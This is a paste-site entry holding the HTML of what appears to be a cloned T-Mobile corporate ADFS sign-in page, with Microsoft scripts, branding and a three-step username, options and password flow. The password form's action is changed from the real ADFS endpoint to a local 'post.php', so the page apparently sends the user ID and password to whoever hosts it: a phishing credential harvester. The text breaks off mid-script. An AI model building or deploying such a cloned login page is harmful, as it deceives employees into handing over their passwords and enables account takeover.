Untitled
3 years ago in Plain Text
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=1"/>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta http-equiv="cache-control" content="no-cache,no-store"/>
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="expires" content="-1"/>
<meta name='mswebdialog-title' content='Connecting to sts.t-mobile.com'/>
<title>Sign In</title>
<script type='text/javascript'>
//<![CDATA[
function LoginErrors(){this.userNameFormatError = 'Enter your user ID in the format \u0026quot;domain\\user\u0026quot; or \u0026quot;user@domain\u0026quot;.'; this.passwordEmpty = 'Enter your password.'; this.passwordTooLong = 'Password is too long (\u0026gt; 128 characters).';}; var maxPasswordLength = 128;
//]]>
</script>
<script type='text/javascript'>
//<![CDATA[
// Copyright (c) Microsoft Corporation. All rights reserved.
function InputUtil(errTextElementID, errDisplayElementID, errTextPasswordElementID, errPasswordDisplayElementID, errTextOptionElementID, errOptionDisplayElementID) {
if (!errTextElementID) errTextElementID = 'errorText';
if (!errTextPasswordElementID) errTextPasswordElementID = 'errorTextPassword';
if (!errTextOptionElementID) errTextOptionElementID = 'errorTextOption';
if (!errDisplayElementID) errDisplayElementID = 'error';
if (!errPasswordDisplayElementID) errPasswordDisplayElementID = 'errorPassword';
if (!errOptionDisplayElementID) errOptionDisplayElementID = 'errorOption';
this.hasFocus = false;
this.errLabel = document.getElementById(errTextElementID);
this.errDisplay = document.getElementById(errDisplayElementID);
this.errPassLabel = document.getElementById(errTextPasswordElementID);
this.errPassDisplay = document.getElementById(errPasswordDisplayElementID);
this.errOptionLabel = document.getElementById(errTextOptionElementID);
this.errOptionDisplay = document.getElementById(errOptionDisplayElementID);
};
InputUtil.prototype.canDisplayError = function () {
return (this.errLabel && this.errDisplay) || (this.errPassLabel && this.errPassDisplay) || (this.errOptionLabel && this.errOptionDisplay);
}
InputUtil.prototype.checkError = function () {
if (!this.canDisplayError){
throw new Error ('Error element not present');
}
var hasUserError = false;
var hasPassError = false;
var hasOptionError = false;
var cause;
if (this.errLabel && this.errLabel.innerHTML) {
this.errDisplay.style.display = '';
cause = this.errLabel.getAttribute('for');
hasUserError = true;
}
if (this.errPassLabel && this.errPassLabel.innerHTML)
{
this.errPassDisplay.style.display = '';
cause = this.errPassLabel.getAttribute('for');
hasPassError = true;
}
if (this.errOptionLabel && this.errOptionLabel.innerHTML) {
this.errOptionDisplay.style.display = '';
cause = this.errOptionLabel.getAttribute('for');
hasOptionError = true;
}
if (cause) {
var causeNode = document.getElementById(cause);
if (causeNode && causeNode.value) {
causeNode.focus();
this.hasFocus = true;
}
}
if (!hasUserError) {
if (this.errLabel && this.errLabel.innerHTML) {
this.errDisplay.style.display = 'none';
}
}
if (!hasPassError) {
if (this.errPassLabel && this.errPassLabel.innerHTML) {
this.errPassDisplay.style.display = 'none';
}
}
if (!hasOptionError) {
if (this.errOptionLabel && this.errOptionLabel.innerHTML) {
this.errOptionDisplay.style.display = 'none';
}
}
};
InputUtil.prototype.clearError = function() {
if (!this.canDisplayError) {
throw new Error('Error element not present');
}
if (this.errLabel && this.errLabel.innerHTML) {
this.errLabel.innerHTML = '';
this.errDisplay.style.display = 'none';
}
if (this.errPassLabel && this.errPassLabel.innerHTML) {
this.errPassLabel.innerHTML = '';
this.errPassDisplay.style.display = 'none';
}
if (this.errOptionLabel && this.errOptionLabel.innerHTML) {
this.errOptionLabel.innerHTML = '';
this.errOptionDisplay.style.display = 'none';
}
};
InputUtil.prototype.setInitialFocus = function (input) {
if (this.hasFocus) return;
var node = document.getElementById(input);
if (node) {
if ((/^\s*$/).test(node.value)) {
node.focus();
this.hasFocus = true;
}
}
};
InputUtil.prototype.setError = function (input, errorMsg, password) {
if (!this.canDisplayError) {
throw new Error('Error element not present');
}
input.focus();
if (errorMsg) {
if (password) {
this.errPassLabel.innerHTML = errorMsg;
this.errPassDisplay.style.display = '';
} else {
this.errLabel.innerHTML = errorMsg;
this.errDisplay.style.display = '';
}
}
if (password) {
this.errPassLabel.setAttribute('for', input.id);
this.errPassDisplay.style.display = '';
} else {
this.errLabel.setAttribute('for', input.id);
this.errDisplay.style.display = '';
}
};
InputUtil.makePlaceholder = function (input) {
var ua = navigator.userAgent;
if (ua != null &&
(ua.match(/MSIE 9.0/) != null ||
ua.match(/MSIE 8.0/) != null ||
ua.match(/MSIE 7.0/) != null)) {
var node = document.getElementById(input);
if (node) {
var placeholder = node.getAttribute("placeholder");
if (placeholder != null && placeholder != '') {
var label = document.createElement('input');
label.type = "text";
label.value = placeholder;
label.readOnly = true;
label.style.position = 'absolute';
label.style.borderColor = 'transparent';
label.className = node.className + ' hint';
label.tabIndex = -1;
label.onfocus = function () { this.nextSibling.focus(); };
node.style.position = 'relative';
node.parentNode.style.position = 'relative';
node.parentNode.insertBefore(label, node);
node.onkeyup = function () { InputUtil.showHint(this); };
node.onblur = function () { InputUtil.showHint(this); };
node.style.background = 'transparent';
node.setAttribute("placeholder", "");
InputUtil.showHint(node);
}
}
}
};
InputUtil.focus = function (inputField) {
var node = document.getElementById(inputField);
if (node) node.focus();
};
InputUtil.hasClass = function(node, clsName) {
return node.className.match(new RegExp('(\\s|^)' + clsName + '(\\s|$)'));
};
InputUtil.addClass = function(node, clsName) {
if (!this.hasClass(node, clsName)) node.className += " " + clsName;
};
InputUtil.removeClass = function(node, clsName) {
if (this.hasClass(node, clsName)) {
var reg = new RegExp('(\\s|^)' + clsName + '(\\s|$)');
node.className = node.className.replace(reg, ' ');
}
};
InputUtil.showHint = function (node, gotFocus) {
if (node.value && node.value != '') {
node.previousSibling.style.display = 'none';
}
else {
node.previousSibling.style.display = '';
}
};
InputUtil.updatePlaceholder = function (input, placeholderText) {
var node = document.getElementById(input);
if (node) {
var ua = navigator.userAgent;
if (ua != null &&
(ua.match(/MSIE 9.0/) != null ||
ua.match(/MSIE 8.0/) != null ||
ua.match(/MSIE 7.0/) != null)) {
var label = node.previousSibling;
if (label != null) {
label.value = placeholderText;
}
}
else {
node.placeholder = placeholderText;
}
}
};
//]]>
</script>
<script type='text/javascript'>
//<![CDATA[
/*
* Copyright (c) Microsoft Corporation. All rights reserved.
*
* Description: Functions to perform login page pagination
*
*/
PaginationUtil = {
/*
* Helper to extract a query parameter. Taken from Main_Browser.js
*
* param: Name of the parameter to extract.
* returns: The query parameter value if it PaginationUtil.exists otherwise it returns
* an empty string.
*/
ExtractQSParam: function (param) {
var sQS = document.location.search.toLowerCase();
if (sQS)
sQS = sQS.substr(1);
return PaginationUtil.ExtractToken(sQS, param.toLowerCase(), "&", "=", "");
},
/*
* Extract a specific token from a string.
*
* Args:
* sString - the full string
* sName - the name of the token
* sDelim - the token delimiter (default '&')
* sSep - the name=value pair separator (default '=')
*
* Returns: string
* the value of the token if PaginationUtil.exists
* null otherwise
*/
ExtractToken: function (sString, sName, sDelim, sSep, sDefault) {
sDelim = PaginationUtil.valOrDefault(sDelim, "&");
sSep = PaginationUtil.valOrDefault(sSep, "=");
var value = PaginationUtil.valOrDefault(sDefault, null);
if (!sString)
return value;
var start = sString.indexOf(sName + sSep);
if (0 == start) {
start += sName.length + 1;
}
else if (0 < start) {
start = sString.indexOf(sDelim + sName + sSep);
if (0 < start) { start += sDelim.length + sName.length + 1; }
}
if (-1 != start) {
var end = sString.indexOf(sDelim, start);
if (-1 == end) { end = sString.length; }
value = sString.substring(start, end);
}
return value;
},
// Helper to handle supporting default values.
valOrDefault: function (oVal, oDefault) {
return ((PaginationUtil.exists(oVal)) ? oVal : oDefault);
},
// Helper for testing existence.
exists: function (v) {
return ((v) ? true : (v == 0 || v == false || v == ""));
}
}
PaginationManager = {
/*
* Initialize state
* 'options' is an object with extra options to use. An example:
* {
* pages: ["usernamePage", "primaryOptionsPage", "passwordPage"], // required
* currentPageIndex: 0 // optional - default 0
* }
*/
Initialize: function (options) {
this.options = options || { pages: ["usernamePage", "primaryOptionsPage", "passwordPage"], currentPageIndex: 0 };
this.debugMode = PaginationUtil.ExtractQSParam('debugMode').toLowerCase();
var pageElements = [];
for (var i = 0; i < this.options.pages.length; i++) {
pageElements.push(document.getElementById(this.options.pages[i]));
}
this.options.pages = pageElements;
this.initializePageDisplayedElements();
},
initializePageDisplayedElements: function() {
_self = this;
// Hide the back button on pages that can't go back
if (_self.options.pages && _self.options.pages[0]) {
var passwordBack = document.getElementById("backButtonArea");
var optionsBack = document.getElementById("optionsBackButtonArea");
if (passwordBack && _self.options.pages[0].id === "passwordPage") {
passwordBack.style.display = "none";
var submitButton = document.getElementById("submitButton");
if (submitButton && submitButton.classList) {
submitButton.classList.remove("rightHalfWidthButton");
}
}
if (optionsBack && _self.options.pages[0].id === "primaryOptionsPage") {
optionsBack.style.display = "none";
}
}
// Hide all pages, and display the start page
_self.adjustElementDisplay(_self.options.pages, "none");
_self.adjustElementDisplay([_self.options.pages[_self.options.currentPageIndex]], "block");
},
adjustElementDisplay: function (elementList, display)
{
for ( var i = 0; i < elementList.length; i++ )
{
if ( elementList[i] && elementList[i].style )
{
elementList[i].style.display = display;
}
}
},
isValidIndex: function (index, arrayLength) {
if (arrayLength <= 0 || index < 0) {
return false;
}
if (index <= arrayLength - 1) {
return true;
}
},
displayPage: function (args) {
var _self = this;
if (_self.options.pages && _self.options.pages.length > 0) {
var exp = 0;
if (args && args.backwards) {
exp = 1;
}
var pageToHideIndex = _self.options.currentPageIndex;
if (_self.isValidIndex(_self.options.currentPageIndex + Math.pow(-1, exp), _self.options.pages.length)) {
_self.options.currentPageIndex = _self.options.currentPageIndex + Math.pow(-1, exp);
_self.redrawPages(pageToHideIndex, _self.options.currentPageIndex);
} else {
if (_self.debugMode && console && console.log) {
console.log("[ADFS]: Attempted to navigate to an invalid page index");
}
}
}
},
updatePagesWithUsername: function (username) {
var idBanner = document.getElementById("identityBanner");
var formUsernameInput = document.getElementById("userNameInputHolder");
var optionsUsernameInput = document.getElementById("userNameInputOptionsHolder");
var idBannerOptionsPage = document.getElementById("identityBannerOptions");
var kmsiHolder = document.getElementById("kmsiHolder");
var kmsiInput = document.getElementById("kmsiInput");
if (idBanner) {
idBanner.innerText = username;
}
if (idBannerOptionsPage) {
idBannerOptionsPage.innerText = username;
}
if (formUsernameInput) {
formUsernameInput.value = username;
}
if (optionsUsernameInput) {
optionsUsernameInput.value = username;
}
if (kmsiInput && kmsiHolder) {
kmsiHolder.value = kmsiInput.value;
}
},
validateAndNext: function () {
var u = new InputUtil();
var e = new LoginErrors();
var userName = document.getElementById(Login.userNameInput);
if (!userName.value || !userName.value.match('[@\\\\]')) {
u.setError(userName, e.userNameFormatError);
return false;
}
_self.updatePagesWithUsername(userName.value);
u.clearError();
if (_self.options.currentPageIndex + 1 >= _self.options.pages.length) {
// POST back to ADFS since there are no more pages to go to
document.forms['loginFormPaginated'].submit();
return true;
} else {
_self.displayNextPage();
}
return true;
},
displayNextPage: function () {
_self = this;
_self.displayPage({ backwards: false });
},
displayPreviousPage: function () {
_self = this;
var u = new InputUtil();
u.clearError();
_self.displayPage({ backwards: true });
},
redrawPages: function (pageToHideIndex, pageToShowIndex) {
_self = this;
_self.adjustElementDisplay([_self.options.pages[pageToHideIndex]], "none");
_self.adjustElementDisplay([_self.options.pages[pageToShowIndex]], "block");
_self.setFocus();
},
setFocus: function () {
var usernameInput = document.getElementById(Login.userNameInput);
var passwordInput = document.getElementById(Login.passwordInput);
if (usernameInput && _self.options.pages[_self.options.currentPageIndex] && _self.options.pages[_self.options.currentPageIndex].id === "usernamePage") {
usernameInput.focus();
} else if (passwordInput && _self.options.pages[_self.options.currentPageIndex] && _self.options.pages[_self.options.currentPageIndex].id === "passwordPage") {
passwordInput.focus();
}
}
};
var paginationManager = PaginationManager;
//]]>
</script>
<script type='text/javascript'>
//<![CDATA[
LoginManager = {
initialize: function () {
var u = new InputUtil();
this.userNameInput = 'userNameInput';
this.userNameInputHolder = 'userNameInputHolder';
this.passwordInput = 'passwordInput';
u.checkError();
u.setInitialFocus(Login.userNameInput);
u.setInitialFocus(Login.passwordInput);
},
submitLoginRequest: function () {
var u = new InputUtil();
var e = new LoginErrors();
var userName = document.getElementById(Login.userNameInput);
var userNamePaginated = document.getElementById(Login.userNameInputHolder);
var password = document.getElementById(Login.passwordInput);
if (!userName && userNamePaginated) {
userName = userNamePaginated;
}
if (!userName.value || !userName.value.match('[@\\\\]')) {
u.setError(userName, e.userNameFormatError);
return false;
}
if (!password.value) {
u.setError(password, e.passwordEmpty, true);
return false;
}
if (password.value.length > maxPasswordLength) {
u.setError(password, e.passwordTooLong, true);
return false;
}
document.forms['loginForm'].submit();
return false;
}
};
var Login = LoginManager;
Login.initialize();
InputUtil.makePlaceholder(Login.userNameInput);
InputUtil.makePlaceholder(Login.passwordInput);
//]]>
</script>
<link rel="stylesheet" type="text/css" href="/adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37" /><style>.illustrationClass {background-image:url(/adfs/portal/illustration/illustration.jpg?id=2DAD086C9485B05425C5550912B47BA35AE1DD9E2183368DA62A9C6A47DB4B9E);}</style>
</head>
<body dir="ltr" class="body">
<div id="noScript" style="position:static; width:100%; height:100%; z-index:100">
<h1>JavaScript required</h1>
<p>JavaScript is required. This web browser does not support JavaScript or JavaScript in this web browser is not enabled.</p>
<p>To find out if your web browser supports JavaScript or to enable JavaScript, see web browser help.</p>
</div>
<script type="text/javascript" language="JavaScript">
document.getElementById("noScript").style.display = "none";
</script>
<div id="fullPage">
<div id="brandingWrapper" class="float">
<div id="branding"></div>
</div>
<div id="contentWrapper" class="float">
<div id="content">
<div id="header">
<img class='logoImage' id='companyLogo' src='/adfs/portal/logo/logo.png?id=B7D73DE66404FAEFF83F60184E9E1852C87E18AF9E08B3752A9ECD7AE49DB778' alt='sts.t-mobile.com'/>
</div>
<main>
<div id="workArea">
<div id="authArea" class="groupMargin">
<div id="loginArea">
<div id="usernamePage">
<div id="loginMessage" class="groupMargin">Sign in</div>
<form method="post" id="loginFormPaginated" class="paginatedPageForm" autocomplete="off" novalidate="novalidate" onKeyPress="if (event && event.keyCode == 13) event.preventDefault();" action="/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3dhttps%253a%252f%252fsso.brassring.com%252fSSO%252fSAML%252fSAML2PageListener%252fAuthenticationRequestor.aspxDL&client-request-id=66293c9e-c1b1-46bc-2b0a-0080010000be">
<div id="formsAuthenticationArea">
<div id="userNameArea">
<label id="userNameInputLabel" for="userNameInput" class="hidden">User Account</label>
<input id="userNameInput" name="UserName" type="email" value="" tabindex="1" class="text textPaginated fullWidth" onKeyPress="if (event && event.keyCode == 13) paginationManager.validateAndNext();"
spellcheck="false" placeholder="[email protected]" autocomplete="off"/>
</div>
<div id="error" class="fieldMargin error errorUsernamePaginated smallText">
<span id="errorText" for="" class="errorText" aria-live="assertive" role="alert"></span>
</div>
<div id="introduction" class="groupMargin signInIntroduction">
<p>Sign in using your T-Mobile email address and your NT password.</p>
</div>
<div id="kmsiArea" class="kmsiAreaPaginated" style="display:none">
<input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="2"/>
<label for="kmsiInput">Keep me signed in</label>
</div>
</div>
</form>
<div id="nextButtonArea">
<span id="nextButton" class="next" tabindex="3" role="button"
onKeyPress="if (event && (event.keyCode == 32 || event.keyCode == 13)) paginationManager.validateAndNext();"
onclick="return paginationManager.validateAndNext();">Next</span>
</div>
</div>
<div id="primaryOptionsPage">
<div id="optionsBannerContainer" class="bannerContainer">
<div id="optionsBackButton" class="back" tabindex="1" role="button"
onKeyPress="if (event && (event.keyCode == 32 || event.keyCode == 13)) paginationManager.displayPreviousPage();"
onclick="return paginationManager.displayPreviousPage();"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAAGgrv1cAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAABsUExURQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHQi/6oAAAAjdFJOUwAIGDk6Ozw9PkBQUlNUVVZ4gIePt7m6u7y9vsvQ0tPU1dbX/DkTUQAAAAlwSFlzAAAOwwAADsMBx2+oZAAAAIlJREFUKFOdj9kSgyAMRa/YVrta0O6LVv7/H4142wFbZzqch+QEAgR8MEM6Dkm4usjlESsXdy6+O747FbNw3lCAttJkKZUJj43KKbybkd8pwuJJEWYNRVCWT2oNJDbhcs//VSSqvdECsstjTfWZn+ot1Sc9vApqwN7+QP4osxtrJqaP20JZUuIAOno0CHuPLa6MAAAAAElFTkSuQmCC"></div>
<div id="identityBannerOptions" class="identityBanner"></div>
</div>
<div id="primaryAuthOptionsTitle" class="authOptionsTitlePaginated">Authentication options</div>
<div id="errorOption" class="error authOptionsError smallText">
<span id="errorTextOption" class="authOptionsErrorText" for="" aria-live="assertive" role="alert"></span>
</div>
<input id="optionForms" type="hidden" name="AuthMethod" value="FormsAuthentication"/>
<div id="authOptions">
<form id="options" method="post" action="https://sts.t-mobile.com:443/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3dhttps%253a%252f%252fsso.brassring.com%252fSSO%252fSAML%252fSAML2PageListener%252fAuthenticationRequestor.aspxDL&client-request-id=66293c9e-c1b1-46bc-2b0a-0080010000be">
<script type="text/javascript">
function SelectOption(option) {
var w = document.getElementById('waitingWheelDiv');
if(w) w.style.display = 'inline';
var i = document.getElementById('optionSelection');
i.value = option;
document.forms['options'].submit();
return false;
}
</script>
<input id="optionSelection" type="hidden" name="AuthMethod" />
<input id="userNameInputOptionsHolder" name="UserName" value="" type="hidden"/>
<div id='authOptionLinks' class='groupMargin'><div id="optionsContainer" class="optionButtonContainer" tabindex="2" role="button" onKeyPress="if (event && (event.keyCode == 32 || event.keyCode == 13)) paginationManager.displayNextPage(); return false;"><div id="optionIcon"><img alt="icon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAACXBIWXMAAAsSAAALEgHS3X78AAAA9UlEQVRIie2V4W3CMBSEPyr+wwhsQJggvg0YoRvACIzQEToCTPBgA0agG7BBKkuHZIhF/ySVqHpSZPvsd+f4PdmTrusYE2+jqv+GwSSlNOoZTd2egOPA2globwbHiNgNqS4p67Wvn+TXN5jWSEnJVXAFPiPiKmkBvHtJ5i6S5ubmLpReJfYMLLQHZqbyeGtuaW4NNECulI25raQmG5d6tSNaFOJYiEK87DcFN3PsHWoGZ+CrGO/dHgru8DCHY84/GuTz9s4ErCLiw/zanNzHcyvzjWPvUE2yF/YSVktiRPR2/fQPhsbfeQ9Gv65bf4Pj/9F/DuAbVoZQOfjl+HcAAAAASUVORK5CYII="></div><span class="optionButton" href="#" id="FormsAuthentication" onclick="paginationManager.displayNextPage(); return false;">Password</span></div><div id="optionsContainer" class="optionButtonContainer" tabindex="2" role="button" onKeyPress="if (event && (event.keyCode == 32 || event.keyCode == 13)) SelectOption('CertificateAuthentication'); return false;"><div id="optionIcon"><img alt="icon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAACXBIWXMAAAsSAAALEgHS3X78AAABSUlEQVRIDbWVgVHDMAxFBdcB2ARGqCZINiBskA3SbBA2KBvQCT6dgLIBG5QNwn1OAuOzOdcJuvPZcZz/bEmRr+Z5FjdV/XkotzcR2QL4SH2RAhxF5KVQfrA+C0kBRgC7EvXoxEnIdeFO/7JHE7/lyVX1Zm0Ad7zNQdYAiLklCVkDMFgsziYu1vccbBaKjzmoDxYBctmmqlnAA4D9EmhsvwAUV9VWRO5s6gTgeRWAqlJ0HwTK55kZHYBTDSDMIhc/UNfaweaq3baxXbYuDqAN3jOf6aKGa2rc5Sdwn0+JNVO0pgrwb+YAD2CfAPXRmovsKwb0rWVLYz6fAvGGNaY2XcP/oBORVxNsonVdrQu/YxDk+dFqzGhjqf0HJBNkXpfv1kqvzqylit1Q+G01gPZk/b1PqCovFLZFAArvANA9FGU59pJM8ctOJyKfiBh/XkPI7UsAAAAASUVORK5CYII="></div><span class="optionButton" href="#" id="CertificateAuthentication" onclick="SelectOption('CertificateAuthentication'); return false;">Sign in using a certificate</span></div><div id="waitingWheelDiv" style="display: none;"><div id="WaitingWheel">
<!-- NOTE: This style portion is identical to cookie pull page, they are not in shared css file because of legacy dependancies for custom themes-->
<!-- CSS for small "waiting" wheel -->
<style>
#floatingCirclesG {
position: relative;
width: 125px;
height: 125px;
margin: auto;
transform: scale(0.4);
-o-transform: scale(0.4);
-ms-transform: scale(0.4);
-webkit-transform: scale(0.4);
-moz-transform: scale(0.4);
}
.f_circleG {
position: absolute;
height: 22px;
width: 22px;
border-radius: 12px;
-o-border-radius: 12px;
-ms-border-radius: 12px;
-webkit-border-radius: 12px;
-moz-border-radius: 12px;
animation-name: f_fadeG;
-o-animation-name: f_fadeG;
-ms-animation-name: f_fadeG;
-webkit-animation-name: f_fadeG;
-moz-animation-name: f_fadeG;
animation-duration: 1.2s;
-o-animation-duration: 1.2s;
-ms-animation-duration: 1.2s;
-webkit-animation-duration: 1.2s;
-moz-animation-duration: 1.2s;
animation-iteration-count: infinite;
-o-animation-iteration-count: infinite;
-ms-animation-iteration-count: infinite;
-webkit-animation-iteration-count: infinite;
-moz-animation-iteration-count: infinite;
animation-direction: normal;
-o-animation-direction: normal;
-ms-animation-direction: normal;
-webkit-animation-direction: normal;
-moz-animation-direction: normal;
}
#frotateG_01 {
left: 0;
top: 51px;
animation-delay: 0.45s;
-o-animation-delay: 0.45s;
-ms-animation-delay: 0.45s;
-webkit-animation-delay: 0.45s;
-moz-animation-delay: 0.45s;
}
#frotateG_02 {
left: 15px;
top: 15px;
animation-delay: 0.6s;
-o-animation-delay: 0.6s;
-ms-animation-delay: 0.6s;
-webkit-animation-delay: 0.6s;
-moz-animation-delay: 0.6s;
}
#frotateG_03 {
left: 51px;
top: 0;
animation-delay: 0.75s;
-o-animation-delay: 0.75s;
-ms-animation-delay: 0.75s;
-webkit-animation-delay: 0.75s;
-moz-animation-delay: 0.75s;
}
#frotateG_04 {
right: 15px;
top: 15px;
animation-delay: 0.9s;
-o-animation-delay: 0.9s;
-ms-animation-delay: 0.9s;
-webkit-animation-delay: 0.9s;
-moz-animation-delay: 0.9s;
}
#frotateG_05 {
right: 0;
top: 51px;
animation-delay: 1.05s;
-o-animation-delay: 1.05s;
-ms-animation-delay: 1.05s;
-webkit-animation-delay: 1.05s;
-moz-animation-delay: 1.05s;
}
#frotateG_06 {
right: 15px;
bottom: 15px;
animation-delay: 1.2s;
-o-animation-delay: 1.2s;
-ms-animation-delay: 1.2s;
-webkit-animation-delay: 1.2s;
-moz-animation-delay: 1.2s;
}
#frotateG_07 {
left: 51px;
bottom: 0;
animation-delay: 1.35s;
-o-animation-delay: 1.35s;
-ms-animation-delay: 1.35s;
-webkit-animation-delay: 1.35s;
-moz-animation-delay: 1.35s;
}
#frotateG_08 {
left: 15px;
bottom: 15px;
animation-delay: 1.5s;
-o-animation-delay: 1.5s;
-ms-animation-delay: 1.5s;
-webkit-animation-delay: 1.5s;
-moz-animation-delay: 1.5s;
}
@keyframes f_fadeG {
0% {
background-color: rgb(47, 146, 212);
}
100% {
background-color: rgb(255, 255, 255);
}
}
@-o-keyframes f_fadeG {
0% {
background-color: rgb(47, 146, 212);
}
100% {
background-color: rgb(255, 255, 255);
}
}
@-ms-keyframes f_fadeG {
0% {
background-color: rgb(47, 146, 212);
}
100% {
background-color: rgb(255, 255, 255);
}
}
@-webkit-keyframes f_fadeG {
0% {
background-color: rgb(47, 146, 212);
}
100% {
background-color: rgb(255, 255, 255);
}
}
@-moz-keyframes f_fadeG {
0% {
background-color: rgb(47, 146, 212);
}
100% {
background-color: rgb(255, 255, 255);
}
}
</style>
<!-- Div containing small "waiting" wheel -->
<div id="floatingCirclesG">
<div class="f_circleG" id="frotateG_01"></div>
<div class="f_circleG" id="frotateG_02"></div>
<div class="f_circleG" id="frotateG_03"></div>
<div class="f_circleG" id="frotateG_04"></div>
<div class="f_circleG" id="frotateG_05"></div>
<div class="f_circleG" id="frotateG_06"></div>
<div class="f_circleG" id="frotateG_07"></div>
<div class="f_circleG" id="frotateG_08"></div>
</div>
</div></div></div>
</form>
</div>
</div>
<div id="passwordPage">
<div id="passwordBannerContainer" class="bannerContainer">
<div id="backButton" class="back" tabindex="2" role="button"
onKeyPress="if (event && (event.keyCode == 32 || event.keyCode == 13)) paginationManager.displayPreviousPage();"
onclick="return paginationManager.displayPreviousPage();"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAAGgrv1cAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAABsUExURQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHQi/6oAAAAjdFJOUwAIGDk6Ozw9PkBQUlNUVVZ4gIePt7m6u7y9vsvQ0tPU1dbX/DkTUQAAAAlwSFlzAAAOwwAADsMBx2+oZAAAAIlJREFUKFOdj9kSgyAMRa/YVrta0O6LVv7/H4142wFbZzqch+QEAgR8MEM6Dkm4usjlESsXdy6+O747FbNw3lCAttJkKZUJj43KKbybkd8pwuJJEWYNRVCWT2oNJDbhcs//VSSqvdECsstjTfWZn+ot1Sc9vApqwN7+QP4osxtrJqaP20JZUuIAOno0CHuPLa6MAAAAAElFTkSuQmCC"></div>
<div id="identityBanner" class="identityBanner"></div>
</div>
<div id="formsAuthenticationAreaPassword">
<form method="post" id="loginForm" autocomplete="off" class="paginatedPageForm" novalidate="novalidate" onKeyPress="if (event && event.keyCode == 13) return Login.submitLoginRequest();" action="post.php"
<input id="userNameInputHolder" name="UserName" value="" type="hidden"/>
<input id="kmsiHolder" name="Kmsi" value="" type="hidden"/>
<input id="formsAuthMethod" type="hidden" name="AuthMethod" value="FormsAuthentication"/>
<div id="passwordArea">
<label id="passwordInputLabel" for="passwordInput" class="hidden">Password</label>
<input id="passwordInput" name="Password" type="password" tabindex="1" class="text textPaginated fullWidth"
placeholder="Password" autocomplete="off"/>
</div>
<span id="submitButton" class="submit submitPaginated" tabindex="3" role="button"
onKeyPress="if (event && (event.keyCode == 32 || event.keyCode == 13)) Login.submitLoginRequest();"
onclick="return Login.submitLoginRequest();">Sign in</span>
</form>
<div id="errorPassword" class="fieldMargin error smallText">
<span id="errorTextPassword" for="" class="errorText" aria-live="assertive" role="alert"></span>
</div>
</div>
</div>
<script type="text/javascript">
var options = {
pages: ["usernamePage","primaryOptionsPage","passwordPage"],
currentPageIndex: 0
};
paginationManager.Initialize(options);
</script>
</div>
</div>
</div>
</main>
<div id="footerPlaceholder"></div>
</div>
<footer id="footer">
<div id="footerLinks" class="floatReverse">
<div><span id="copyright">&#169; 2018 Microsoft</span><a id="helpDesk" class="pageLink footerLink" href="mailto:[email protected]">EIT Service Desk</a></div>
</div>
</footer>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
// Copyright (c) Microsoft Corporation. All rights reserved.
// This file contains several workarounds on inconsistent browser behaviors that administrators may customize.
"use strict";
// iPhone email friendly keyboard does not include "\" key, use regular keyboard instead.
// Note change input type does not work on all versions of all browsers.
if (navigator.userAgent.match(/iPhone/i) != null) {
var emails = document.querySelectorAll("input[type='email']");
if (emails) {
for (var i = 0; i < emails.length; i++) {
emails[i].type = 'text';
}
}
}
// In the CSS file we set the ms-viewport to be consistent with the device dimensions,
// which is necessary for correct functionality of immersive IE.
// However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
// values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
// Windows 8 phone has agent string 'IEMobile 10.0'
if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
var msViewportStyle = document.createElement("style");
msViewportStyle.appendChild(
document.createTextNode(
"@-ms-viewport{width:auto!important}"
)
);
msViewportStyle.appendChild(
document.createTextNode(
"@-ms-viewport{height:auto!important}"
)
);
document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
}
// If the innerWidth is defined, use it as the viewport width.
if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
var viewport = document.querySelector("meta[name=viewport]");
viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, user-scalable=1');
}
// Gets the current style of a specific property for a specific element.
function getStyle(element, styleProp) {
var propStyle = null;
if (element && element.currentStyle) {
propStyle = element.currentStyle[styleProp];
}
else if (element && window.getComputedStyle) {
propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
}
return propStyle;
}
// The script below is used for downloading the illustration image
// only when the branding is displaying. This script work together
// with the code in PageBase.cs that sets the html inline style
// containing the class 'illustrationClass' with the background image.
var computeLoadIllustration = function () {
var branding = document.getElementById("branding");
var brandingDisplay = getStyle(branding, "display");
var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");
if (brandingDisplay && brandingDisplay !== "none" &&
brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
var newClass = "illustrationClass";
if (branding.classList && branding.classList.add) {
branding.classList.add(newClass);
} else if (branding.className !== undefined) {
branding.className += " " + newClass;
}
if (window.removeEventListener) {
window.removeEventListener('load', computeLoadIllustration, false);
window.removeEventListener('resize', computeLoadIllustration, false);
}
else if (window.detachEvent) {
